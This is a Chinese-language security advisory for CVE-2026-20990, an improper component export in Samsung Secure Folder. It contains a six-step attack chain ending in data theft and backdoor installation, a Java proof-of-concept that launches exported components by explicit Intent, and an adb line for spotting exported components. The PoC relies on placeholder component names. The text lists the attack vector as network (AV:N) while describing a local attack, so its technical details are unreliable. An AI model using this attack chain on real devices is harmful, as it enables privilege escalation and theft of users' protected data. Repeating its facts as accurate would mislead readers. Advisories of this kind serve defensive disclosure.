CVE-2026-20990 三星Secure Folder组件导出漏洞导致权限提升

漏洞信息

漏洞编号

CVE-2026-20990

漏洞类型

组件导出漏洞/权限提升

CVSS评分

8.1 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Samsung Secure Folder (Android)

漏洞概述

CVE-2026-20990是三星Android设备上Secure Folder应用中的一个严重安全漏洞。该漏洞源于Secure Folder应用中的组件被不当导出（Improper Export），导致本地攻击者可以启动任意Activity并以Secure Folder的高权限执行操作。Secure Folder是三星基于Android工作配置文件（Work Profile）功能构建的安全隔离空间，用于保护用户的敏感应用和数据。由于Secure Folder运行在隔离的环境中，拥有较高的系统权限，攻击者一旦成功利用此漏洞，即可突破应用隔离边界，访问Secure Folder中的敏感数据、执行特权操作或进一步进行横向渗透。此漏洞影响所有在SMR（三星月度安全更新）2026年3月发布版1之前的三星设备。鉴于该漏洞的CVSS评分达到8.1分，且利用复杂度较低，对用户隐私和数据安全构成严重威胁。三星已于2026年3月16日发布安全更新修复此漏洞，建议所有受影响设备用户尽快更新系统。

技术细节

该漏洞的根本原因在于Samsung Secure Folder应用中的Android组件（如Activity、Service、BroadcastReceiver等）被错误地设置为exported=true，导致其他应用可以无需适当权限即可与这些组件进行交互。在Android安全模型中，应用组件默认是不可导出的，只有明确设置exported属性为true或定义intent-filter时才会被导出。当Secure Folder的组件被不当导出后，本地恶意应用可以构造特定的Intent来启动这些组件，利用Secure Folder运行在特权上下文的优势执行未经授权的操作。攻击者通常通过以下方式利用：1) 枚举目标设备上安装的应用，识别存在漏洞的Secure Folder版本；2) 构造恶意Intent指定目标Activity或Service的组件名称；3) 调用startActivity()或startService()等方法触发目标组件；4) 在Secure Folder的特权上下文中执行代码或访问敏感数据。由于Secure Folder基于Android工作配置文件机制实现，其拥有独立的存储空间和系统权限，攻击成功可导致敏感数据泄露、隐私侵犯甚至设备完全沦陷。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者在目标设备上安装恶意应用，通过PackageManager枚举已安装应用，识别Samsung Secure Folder应用包名（com.samsung.android.authmanager）及其版本信息，判断是否存在漏洞

STEP 2

步骤2: 漏洞分析

攻击者通过反编译Secure Folder APK或使用adb命令（dumpsys package）分析导出的组件，识别可被利用的Activity、Service或BroadcastReceiver组件及其参数

STEP 3

步骤3: 构造恶意Intent

攻击者构造恶意的Android Intent对象，设置目标组件（ComponentName）为Secure Folder中存在漏洞的导出组件，并携带特定的extras数据用于触发漏洞利用逻辑

STEP 4

步骤4: 触发漏洞

恶意应用调用startActivity()、startService()或sendBroadcast()等方法，将构造的Intent发送给存在漏洞的Secure Folder组件，由于组件导出且无适当权限校验，触发成功

STEP 5

步骤5: 权限提升与数据窃取

Secure Folder组件在特权上下文中执行攻击者指定的操作，攻击者成功实现：启动任意Activity访问敏感界面、调用特权Service执行高危操作、或获取Secure Folder隔离环境中的敏感数据

STEP 6

步骤6: 持久化与横向渗透

攻击者利用获取的高权限访问权限，进一步窃取用户隐私数据、安装后门程序、修改系统设置或进行横向移动攻击其他应用

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2026-20990 PoC - Exploit Improper Component Export in Samsung Secure Folder
// This PoC demonstrates how a local attacker can launch arbitrary activity with Secure Folder privilege

package com.example.cve20990poc;

import android.content.ComponentName;
import android.content.Intent;
import android.os.Bundle;
import android.app.Activity;
import android.util.Log;

public class ExploitActivity extends Activity {
    private static final String TAG = "CVE-2026-20990";
    
    // Secure Folder package name (varies by device model)
    private static final String SECURE_FOLDER_PKG = "com.samsung.android.authmanager";
    
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        
        Log.d(TAG, "Starting CVE-2026-20990 exploit...");
        
        // Method 1: Try to launch exported Activity in Secure Folder
        tryExploitActivity();
        
        // Method 2: Try to start exported Service
        tryExploitService();
    }
    
    private void tryExploitActivity() {
        try {
            // Target specific exported Activity in Secure Folder
            // Note: Actual component names need to be identified via decompilation
            ComponentName component = new ComponentName(
                SECURE_FOLDER_PKG,
                "com.samsung.android.authmanager.ExportedActivityName"
            );
            
            Intent intent = new Intent();
            intent.setComponent(component);
            intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
            
            // Attempt to start the activity with Secure Folder privilege
            startActivity(intent);
            Log.d(TAG, "Activity launch attempted successfully");
            
        } catch (Exception e) {
            Log.e(TAG, "Activity exploit failed: " + e.getMessage());
        }
    }
    
    private void tryExploitService() {
        try {
            ComponentName serviceComponent = new ComponentName(
                SECURE_FOLDER_PKG,
                "com.samsung.android.authmanager.ExportedServiceName"
            );
            
            Intent serviceIntent = new Intent();
            serviceIntent.setComponent(serviceComponent);
            
            // Start service with Secure Folder privilege context
            startService(serviceIntent);
            Log.d(TAG, "Service start attempted");
            
        } catch (Exception e) {
            Log.e(TAG, "Service exploit failed: " + e.getMessage());
        }
    }
}

// Detection script for identifying vulnerable devices:
// adb shell dumpsys package com.samsung.android.authmanager | grep -i exported

影响范围

Samsung Secure Folder < SMR Mar-2026 Release 1 (所有搭载三星Secure Folder功能且系统版本低于2026年3月安全补丁的Android设备)

防御指南

临时缓解措施

在无法立即更新系统的情况下，可采取以下临时缓解措施：1) 暂时禁用Secure Folder功能（设置>生物识别和安全性>安全文件夹>更多设置>卸载），但这将影响受保护应用和数据；2) 审查并卸载所有非必要应用，减少攻击面；3) 启用Google Play Protect实时保护功能；4) 避免安装来自未知来源的APK文件，在系统设置中关闭"未知来源"安装选项；5) 考虑使用其他设备隔离敏感应用；6) 密切关注三星官方安全公告，及时获取最新修复信息。